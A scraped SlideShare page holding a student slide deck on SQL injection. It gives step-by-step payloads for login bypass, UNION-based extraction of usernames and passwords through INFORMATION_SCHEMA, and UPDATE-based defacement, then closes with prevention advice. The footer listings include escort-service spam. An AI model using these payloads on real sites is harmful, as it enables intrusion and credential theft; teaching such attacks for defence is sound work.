SlideShare a Scribd company logo

Sql injections

Download as PPT, PDF
Manish Kushwaha
Manish Kushwaha

Basis SQL injection demonstration

Education
1 of 25
SQL Injection Presented by : Manish and Manish
SQL INJECTION  Introduction  Why SQL Injection  What is needed for this  What you can do with SQL Injection  What are its pros and cons  Why we need to know and how we can prevent our database from SQL injection attacks
Introduction A SQL Injection attack is a form of attack that comes from user input that has not been checked to see that it is valid. The objective is to fool the database system into running malicious code that will reveal sensitive information or otherwise compromise the server. SQL is relatively easy to read, a little more difficult to write There is a necessity to understand the different types of SELECT commands that are mostly used to retrieve information from a database.
About SQL  web scripting (computer) language.  used to make dynamic websites.  is used to insert, display and store information from a website on a server.  One can manipulate their own site according to their will.  Without SQL no one can even imagine to have working site(dynamic)  works on the servers say apache, MS server etc.
Vulnerabilities  SQL injection vulnerabilities come in two main forms.  Both forms involve injecting SQL code into a website.  (1) Injecting into a form. Such as username and password boxes on a login page.  (2) Injecting into a URL. Like http://www.example.com/product.php?id=10
How SQL works  Before you can perform an injection, you must first understand how SQL works.  the username and password you entered is kept in the site's member table  The login form takes the conditions that you supply, and searches the member table for any rows that satisfy those conditions.  If a row exists that has both the same username and password, then you are allowed to go on your account else print error message >>continued
•If a site has a news section, there may be an SQL table that, for example, holds all of the article names. •When you click a link like this, www.site.com/news.asp?ArticleID =10, the link tells the site to look in the table that stores the article names for an article who’s "Article ID" is 10. Article Name Article_ID Title 10 Cats 11 Dogs 12 Cows SQL can also display information on a website
Commands (a) What They Are and What to Look for: • By typing certain words called commands, you are able to tell the SQL server (the website) what you want to do to a specific table, column, or record. • If you are injecting into a URL (link) you place your command after the "=" sign in the URL. • If you are injecting into a form, such as a login form, put your command(s) in the boxes where you would normally type your username and password.
•(b) Familiarization and Syntax •The manner in which you write commands is called syntax. •You must use the right syntax in order for the SQL server to understand what you want it to do. •You will see a language, not just words on a screen.
Form Injection  The easiest SQL injection to perform is called "Authorization Bypass  We must trick the website into thinking that we have supplied a correct username and password by making it return at least one row.  The username and password boxes are each surrounded by invisible single quotes.  Username: The username 'Bob' will be searched for in the member table. >>cont.. Bob
•If you have an opening quotation mark in Authorization Bypass you must always put a closing quotation mark or else you will get an error. Username: •'z'' (an opening quotation mark, the letter z, a closing single quotation mark, and an opening quotation mark) will be searched for in the member table. •Now, let's try submitting the following z' OR 'x'='x. >>cont.. Z
The INFORMATION_SCHEMA  The "INFORMATION_SCHEMA" holds the names of every table and column on a site, its name will never change.  The table in the "INFORMATION_SCHEMA" that holds the names of all the other tables is called "INFORMATION_SCHEMA.TABLES.“  The name of the tables that holds the information in "INFORMATION_SCHEMA.TABLES" is called "table_name.”  The table in the "INFORMATION_SCHEMA" that holds the names of all the other columns is called "INFORMATION_SCHEMA.COLUMNS.“  The name of the column that holds the information in "INFORMATION_SCHEMA.COLUMNS“ is called "column_name."
URL Injection  In a link on a website you may find that there is an "=" sign. you will need to type commands after the "=" sign.  Simply start typing the commands after the equals sign and click "Go" in your web browser, as if you are going to a new website.  The example URL on which we will perform example attacks will be www.site.com/news.asp?ArticleID=10.
Attack 1 GOAL: Obtain a username and password. Vulnerable URL: www.site.com/news.asp?ArticleID=10 STEP 1: Determine if link is vulnerable. a. www.site.com/news.asp?ArticleID=10+AND+1=0--  Command Translation: Display article 10 only if the number 1 is the same as the number 0. b. www.site.com/news.asp?ArticleID=10+AND+1=1--  Command Translation: Display article 10 only if the number 1 is the same as the number 1.
Real World Examples  On August 17, 2009, the United States Justice Department charged an American citizen Albert Gonzalez and two unnamed Russians with the theft of 130 million credit card numbers using an SQL injection attack.  In 2008 a sweep of attacks began exploiting the SQL injection vulnerabilities of Microsoft's IIS web server and SQL database server. Over 500,000 sites were exploited.
Attack 1(cont..) STEP 2 Find total number of columns displayed on the page. a. www.site.com/news.asp?ArticleID=10+ORDER+BY+1--  -"ORDER BY 1" (where "1" is the column number) tells the page to display the first column on the page first. b. Repeat step 2a, increasing the number "1" by one each time until you receive an error.  i. Stop when you get an error message, subtract one from this number and record it.  ii. You have now discovered that there are n total columns on the page.
Attack 1(cont..) STEP 3 Displaying table names. a. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- • Command Reminder: "SELECT" tells the website to display the information that you specify from the table. • Notice: You must change the original article number (10) to negative one. b. www.site.com/news.asp?ArticleID = • -1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES-- • Reminder: You may replace any number that was displayed on the webpage (preferably only one of them) with "table_name." • Command Translation: Show me the name of a table.
Attack 1(cont..) STEP 4 Find target table name. a. www.site.com/news.asp?ArticleID =  - 1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TA BLES+ WHERE+table_name>'displayed_table'--  Command Translation: Display the name of the next table in the list after 'displayed_table.' b. Repeat step 4a until a reasonable name for a members table is displayed.  For our attack, let’s say we have found a table named "UserAccounts"
Attack 1(cont..) STEP 5 Displaying column names. a. www.site.com/news.asp?ArticleID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+ WHERE+table_name='UserAccounts'--  Command Translation: Show me the names of the columns in the table "UserAccounts" STEP 6 Find target columns. a. www.site.com/news.asp?ArticleID =- 1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+ table_name='UserAccounts'+AND+column_name>'displayed_column'--  If you are looking for user, pass, login_name, etc... b. Repeat step 6a until you find the right column names.  -For our example attack, we will imagine that we have come across columns named "username" and "password".
Attack 1(cont..) STEP 7 Displaying records (finally!). Table Name: "UserAccounts" Column Names: "username“ "password" a. www.site.com/news.asp?ArticleID=- 1+UNION+SELECT+1,username,3+FROM+UserAccounts--  Command Translation: Display the first record in the column "username" from the table "UserAccounts." b. www.site.com/news.asp?ArticleID =- 1+UNION+SELECT+1,password,3+FROM+UserAccounts+WHERE+username=‘Jassi'--  In our hypothetical attack, the webpage has displayed “spwb." Username: Jassi - Password: spwb
Attack 2 GOAL: Alter text displayed on a webpage. Vulnerable URL: www.site.com/news.asp?ArticleID= 10 STEP 1: Find table and column name. a. www.site.com/news.asp?ArticleID=10+HAVING+1=1--  This command ("HAVING+1=1") should cause an error to be shown.  The error message will look something like this: "Column 'news.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause."  "news.id" in the error message means that there is a column called "id" in the "news" table.
Attack 2 (cont..) STEP 2 Find a useful column name. a. www.site.com/news.asp?ArticleID =10+GROUP+BY+id+HAVING+1=1--  To show the next column name in the table, you add "GROUP+BY+id" before the command "HAVING."  This command produces another error message, this time the "id" part of "news.id" in the error message will change, and this is the next column name. b. www.site.com/news.asp?ArticleID =10+GROUP+BY+id,release+HAVING+1=1--  To continue displaying column names, add a comma and the column name in the error message. • The comma separated list can be as long as necessary, just keep adding commas and the column name in the current error message. • Now let's say the error message shows us the column name "title“ (“news.title”).
Attack 2 (cont..) STEP 3 Changing the webpage. a. www.site.com/news.asp?ArticleID =10+UPDATE+news+set+title='sql injected'--  This will change all of the titles in the table news to "sql injected." b. www.site.com/news.asp?ArticleID= 10+UPDATE+news+set+title='sqlinjected'+WHERE+id=10—  This will change only the title of article number 10 to "sql injected"  you can change "id=10" to "id=8", but to see the change you must go to "www.site.com/news.asp?ArticleID=8".
 You can prevent SQL injection if you adopt an input validation technique in which user input is authenticated against a set of defined rules for length, type and syntax and also against business rules.  You should ensure that users with the permission to access the database have the least privileges. Additionally, do not use system administrator accounts like “sa” for web applications. Also, you should always make sure that a database user is created only for a specific application and this user is not able to access other applications.  Another method for preventing SQL injection attacks is to remove all stored procedures that are not in use.  Use strongly typed parameterized query APIs with placeholder substitution markers, even when calling stored procedures.  Show care when using stored procedures since they are generally safe from injection. However, be careful as they can be injectable (such as via the use of exec() or concatenating arguments within the stored procedure). Preventing SQL Injection

Recommended

Sql Injection
Sql Injection Sql Injection
Sql Injection Sanjeev Kumar Jaiswal
 
Ischoolwebboard 2
Ischoolwebboard 2Ischoolwebboard 2
Ischoolwebboard 2John Macasio
 
Ext js user login panel
Ext js user login panelExt js user login panel
Ext js user login panelArun Prasad
 
Designing an ExtJS user login panel
Designing an ExtJS user login panelDesigning an ExtJS user login panel
Designing an ExtJS user login panelArun Prasad
 
Secure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web ApplicationsSecure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web Applicationsn|u - The Open Security Community
 
Introduction to ExtJS lesson 01 Part two
Introduction to ExtJS lesson 01 Part twoIntroduction to ExtJS lesson 01 Part two
Introduction to ExtJS lesson 01 Part twoArun Prasad
 
Trailblazer: Enabling Blind Web Users to Blaze Trails Through the Web
Trailblazer: Enabling Blind Web Users to Blaze Trails Through the WebTrailblazer: Enabling Blind Web Users to Blaze Trails Through the Web
Trailblazer: Enabling Blind Web Users to Blaze Trails Through the WebJeffrey Bigham
 
Introduction to ExtJS
Introduction to ExtJSIntroduction to ExtJS
Introduction to ExtJSArun Prasad
 

Recommended

Sql Injection
Sql Injection Sql Injection
Sql Injection Sanjeev Kumar Jaiswal
 
Ischoolwebboard 2
Ischoolwebboard 2Ischoolwebboard 2
Ischoolwebboard 2John Macasio
 
Ext js user login panel
Ext js user login panelExt js user login panel
Ext js user login panelArun Prasad
 
Designing an ExtJS user login panel
Designing an ExtJS user login panelDesigning an ExtJS user login panel
Designing an ExtJS user login panelArun Prasad
 
Secure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web ApplicationsSecure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web Applicationsn|u - The Open Security Community
 
Introduction to ExtJS lesson 01 Part two
Introduction to ExtJS lesson 01 Part twoIntroduction to ExtJS lesson 01 Part two
Introduction to ExtJS lesson 01 Part twoArun Prasad
 
Trailblazer: Enabling Blind Web Users to Blaze Trails Through the Web
Trailblazer: Enabling Blind Web Users to Blaze Trails Through the WebTrailblazer: Enabling Blind Web Users to Blaze Trails Through the Web
Trailblazer: Enabling Blind Web Users to Blaze Trails Through the WebJeffrey Bigham
 
Introduction to ExtJS
Introduction to ExtJSIntroduction to ExtJS
Introduction to ExtJSArun Prasad
 
Longtq
LongtqLongtq
Longtqmrlonganh
 
Android interface elements and controls-chapter8
Android interface elements and controls-chapter8Android interface elements and controls-chapter8
Android interface elements and controls-chapter8Dr. Ramkumar Lakshminarayanan
 
Html advanced-reference-guide for creating web forms
Html advanced-reference-guide for creating web formsHtml advanced-reference-guide for creating web forms
Html advanced-reference-guide for creating web formssatish 486
 
Accessibility in Design systems - the pain and glory
Accessibility in Design systems - the pain and gloryAccessibility in Design systems - the pain and glory
Accessibility in Design systems - the pain and gloryRuss Weakley
 
Salesforce Admin's guide : the data loader from the command line
Salesforce Admin's guide : the data loader from the command lineSalesforce Admin's guide : the data loader from the command line
Salesforce Admin's guide : the data loader from the command lineCyrille Coeurjoly
 
Automation Anywhere Case study
Automation Anywhere Case studyAutomation Anywhere Case study
Automation Anywhere Case studyShekar S
 
Project1 VB
Project1 VBProject1 VB
Project1 VBsunmitraeducation
 
Chat php
Chat phpChat php
Chat phpSigit Ariyanto
 
Accessible Inline errors messages
Accessible Inline errors messagesAccessible Inline errors messages
Accessible Inline errors messagesRuss Weakley
 
Devry bis 155 week 4 quiz new
Devry bis 155 week 4 quiz newDevry bis 155 week 4 quiz new
Devry bis 155 week 4 quiz newuopassignment
 
Ms Access
Ms AccessMs Access
Ms Accesssunmitraeducation
 
Salesforce command line data loader
Salesforce command line data loaderSalesforce command line data loader
Salesforce command line data loaderjakkula1099
 
Magento Orders Export and Import User Manual
Magento Orders Export and Import User ManualMagento Orders Export and Import User Manual
Magento Orders Export and Import User ManualAitoc, Inc
 
Warranty management system
Warranty management systemWarranty management system
Warranty management systemMoin Raza Khan
 
Basics of Ext JS
Basics of Ext JSBasics of Ext JS
Basics of Ext JSikhwanhayat
 
Dervy bis 155 week 4 quiz new
Dervy bis 155 week 4 quiz newDervy bis 155 week 4 quiz new
Dervy bis 155 week 4 quiz newkxipvscsk02
 
Php security
Php securityPhp security
Php securityUttam Kumar
 
Php Security
Php SecurityPhp Security
Php SecurityAmit Kumar Singh
 
2_A_Solution_for_preventing_SQL_Injection_in_web_based_applicationx
2_A_Solution_for_preventing_SQL_Injection_in_web_based_applicationx2_A_Solution_for_preventing_SQL_Injection_in_web_based_applicationx
2_A_Solution_for_preventing_SQL_Injection_in_web_based_applicationxOPENLANE
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity FrameworksRich Helton
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 

More Related Content

What's hot

Html advanced-reference-guide for creating web forms
Html advanced-reference-guide for creating web formsHtml advanced-reference-guide for creating web forms
Html advanced-reference-guide for creating web formssatish 486
 
Accessibility in Design systems - the pain and glory
Accessibility in Design systems - the pain and gloryAccessibility in Design systems - the pain and glory
Accessibility in Design systems - the pain and gloryRuss Weakley
 
Salesforce Admin's guide : the data loader from the command line
Salesforce Admin's guide : the data loader from the command lineSalesforce Admin's guide : the data loader from the command line
Salesforce Admin's guide : the data loader from the command lineCyrille Coeurjoly
 
Automation Anywhere Case study
Automation Anywhere Case studyAutomation Anywhere Case study
Automation Anywhere Case studyShekar S
 
Accessible Inline errors messages
Accessible Inline errors messagesAccessible Inline errors messages
Accessible Inline errors messagesRuss Weakley
 
Devry bis 155 week 4 quiz new
Devry bis 155 week 4 quiz newDevry bis 155 week 4 quiz new
Devry bis 155 week 4 quiz newuopassignment
 
Salesforce command line data loader
Salesforce command line data loaderSalesforce command line data loader
Salesforce command line data loaderjakkula1099
 
Magento Orders Export and Import User Manual
Magento Orders Export and Import User ManualMagento Orders Export and Import User Manual
Magento Orders Export and Import User ManualAitoc, Inc
 
Warranty management system
Warranty management systemWarranty management system
Warranty management systemMoin Raza Khan
 
Basics of Ext JS
Basics of Ext JSBasics of Ext JS
Basics of Ext JSikhwanhayat
 
Dervy bis 155 week 4 quiz new
Dervy bis 155 week 4 quiz newDervy bis 155 week 4 quiz new
Dervy bis 155 week 4 quiz newkxipvscsk02
 

What's hot (16)

Longtq
LongtqLongtq
Longtq
 
Android interface elements and controls-chapter8
Android interface elements and controls-chapter8Android interface elements and controls-chapter8
Android interface elements and controls-chapter8
 
Html advanced-reference-guide for creating web forms
Html advanced-reference-guide for creating web formsHtml advanced-reference-guide for creating web forms
Html advanced-reference-guide for creating web forms
 
Accessibility in Design systems - the pain and glory
Accessibility in Design systems - the pain and gloryAccessibility in Design systems - the pain and glory
Accessibility in Design systems - the pain and glory
 
Salesforce Admin's guide : the data loader from the command line
Salesforce Admin's guide : the data loader from the command lineSalesforce Admin's guide : the data loader from the command line
Salesforce Admin's guide : the data loader from the command line
 
Automation Anywhere Case study
Automation Anywhere Case studyAutomation Anywhere Case study
Automation Anywhere Case study
 
Project1 VB
Project1 VBProject1 VB
Project1 VB
 
Chat php
Chat phpChat php
Chat php
 
Accessible Inline errors messages
Accessible Inline errors messagesAccessible Inline errors messages
Accessible Inline errors messages
 
Devry bis 155 week 4 quiz new
Devry bis 155 week 4 quiz newDevry bis 155 week 4 quiz new
Devry bis 155 week 4 quiz new
 
Ms Access
Ms AccessMs Access
Ms Access
 
Salesforce command line data loader
Salesforce command line data loaderSalesforce command line data loader
Salesforce command line data loader
 
Magento Orders Export and Import User Manual
Magento Orders Export and Import User ManualMagento Orders Export and Import User Manual
Magento Orders Export and Import User Manual
 
Warranty management system
Warranty management systemWarranty management system
Warranty management system
 
Basics of Ext JS
Basics of Ext JSBasics of Ext JS
Basics of Ext JS
 
Dervy bis 155 week 4 quiz new
Dervy bis 155 week 4 quiz newDervy bis 155 week 4 quiz new
Dervy bis 155 week 4 quiz new
 

Viewers also liked

2_A_Solution_for_preventing_SQL_Injection_in_web_based_applicationx
2_A_Solution_for_preventing_SQL_Injection_in_web_based_applicationx2_A_Solution_for_preventing_SQL_Injection_in_web_based_applicationx
2_A_Solution_for_preventing_SQL_Injection_in_web_based_applicationxOPENLANE
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity FrameworksRich Helton
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 

Viewers also liked (7)

Php security
Php securityPhp security
Php security
 
Php Security
Php SecurityPhp Security
Php Security
 
2_A_Solution_for_preventing_SQL_Injection_in_web_based_applicationx
2_A_Solution_for_preventing_SQL_Injection_in_web_based_applicationx2_A_Solution_for_preventing_SQL_Injection_in_web_based_applicationx
2_A_Solution_for_preventing_SQL_Injection_in_web_based_applicationx
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 

Similar to Sql injections

Access tips access and sql part 4 building select queries on-the-fly
Access tips access and sql part 4 building select queries on-the-flyAccess tips access and sql part 4 building select queries on-the-fly
Access tips access and sql part 4 building select queries on-the-flyquest2900
 
BUSI 301 Book Review RubricScoreCommentsResearch 25.docx
BUSI 301 Book Review RubricScoreCommentsResearch 25.docxBUSI 301 Book Review RubricScoreCommentsResearch 25.docx
BUSI 301 Book Review RubricScoreCommentsResearch 25.docxhumphrieskalyn
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Access tips access and sql part 3 practical examples
Access tips access and sql part 3 practical examplesAccess tips access and sql part 3 practical examples
Access tips access and sql part 3 practical examplesquest2900
 
Scanned by CamScannerModule 03 Lab WorksheetWeb Developmen.docx
Scanned by CamScannerModule 03 Lab WorksheetWeb Developmen.docxScanned by CamScannerModule 03 Lab WorksheetWeb Developmen.docx
Scanned by CamScannerModule 03 Lab WorksheetWeb Developmen.docxanhlodge
 
SQL Database Performance Tuning for Developers
SQL Database Performance Tuning for DevelopersSQL Database Performance Tuning for Developers
SQL Database Performance Tuning for DevelopersBRIJESH KUMAR
 
Sql Commands
Sql CommandsSql Commands
Sql CommandsSachin MK
 
Php, mysq lpart5(mysql)
Php, mysq lpart5(mysql)Php, mysq lpart5(mysql)
Php, mysq lpart5(mysql)Subhasis Nayak
 
working with database using mysql
working with database using mysql working with database using mysql
working with database using mysql Subhasis Nayak
 
Union based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials PointUnion based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials PointAl Zarqali
 
Web security with Eng Ahmed Galal and Eng Ramy saeid
Web security with Eng Ahmed Galal and Eng Ramy saeid Web security with Eng Ahmed Galal and Eng Ramy saeid
Web security with Eng Ahmed Galal and Eng Ramy saeid Ahmed Ghazey
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injectionavishkarm
 
srt311 Project2
srt311 Project2srt311 Project2
srt311 Project2trayyoo
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injectionnewbie2019
 

Similar to Sql injections (20)

Blind sql injection
Blind sql injectionBlind sql injection
Blind sql injection
 
Blind sql injection
Blind sql injectionBlind sql injection
Blind sql injection
 
Access tips access and sql part 4 building select queries on-the-fly
Access tips access and sql part 4 building select queries on-the-flyAccess tips access and sql part 4 building select queries on-the-fly
Access tips access and sql part 4 building select queries on-the-fly
 
BUSI 301 Book Review RubricScoreCommentsResearch 25.docx
BUSI 301 Book Review RubricScoreCommentsResearch 25.docxBUSI 301 Book Review RubricScoreCommentsResearch 25.docx
BUSI 301 Book Review RubricScoreCommentsResearch 25.docx
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
Sq li
Sq liSq li
Sq li
 
Sql
SqlSql
Sql
 
Access tips access and sql part 3 practical examples
Access tips access and sql part 3 practical examplesAccess tips access and sql part 3 practical examples
Access tips access and sql part 3 practical examples
 
Scanned by CamScannerModule 03 Lab WorksheetWeb Developmen.docx
Scanned by CamScannerModule 03 Lab WorksheetWeb Developmen.docxScanned by CamScannerModule 03 Lab WorksheetWeb Developmen.docx
Scanned by CamScannerModule 03 Lab WorksheetWeb Developmen.docx
 
SQL Database Performance Tuning for Developers
SQL Database Performance Tuning for DevelopersSQL Database Performance Tuning for Developers
SQL Database Performance Tuning for Developers
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql Commands
Sql CommandsSql Commands
Sql Commands
 
Php, mysq lpart5(mysql)
Php, mysq lpart5(mysql)Php, mysq lpart5(mysql)
Php, mysq lpart5(mysql)
 
working with database using mysql
working with database using mysql working with database using mysql
working with database using mysql
 
Union based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials PointUnion based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials Point
 
Web security with Eng Ahmed Galal and Eng Ramy saeid
Web security with Eng Ahmed Galal and Eng Ramy saeid Web security with Eng Ahmed Galal and Eng Ramy saeid
Web security with Eng Ahmed Galal and Eng Ramy saeid
 
SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injection
 
srt311 Project2
srt311 Project2srt311 Project2
srt311 Project2
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 

Recently uploaded

BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...Sapna Thakur
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfAdmir Softic
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphThiyagu K
 
Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDThiyagu K
 
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...PsychoTech Services
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdfQucHHunhnh
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsTechSoup
 
fourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingfourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingTeacherCyreneCayanan
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfciinovamais
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAssociation for Project Management
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxVishalSingh1417
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeThiyagu K
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Sapana Sha
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhikauryashika82
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)eniolaolutunde
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfagholdier
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdfQucHHunhnh
 

Recently uploaded (20)

BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdf
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot Graph
 
Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SD
 
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
 
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The Basics
 
fourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingfourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writing
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across Sectors
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptx
 
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptxINDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and Mode
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
 
Software Engineering Methodologies (overview)
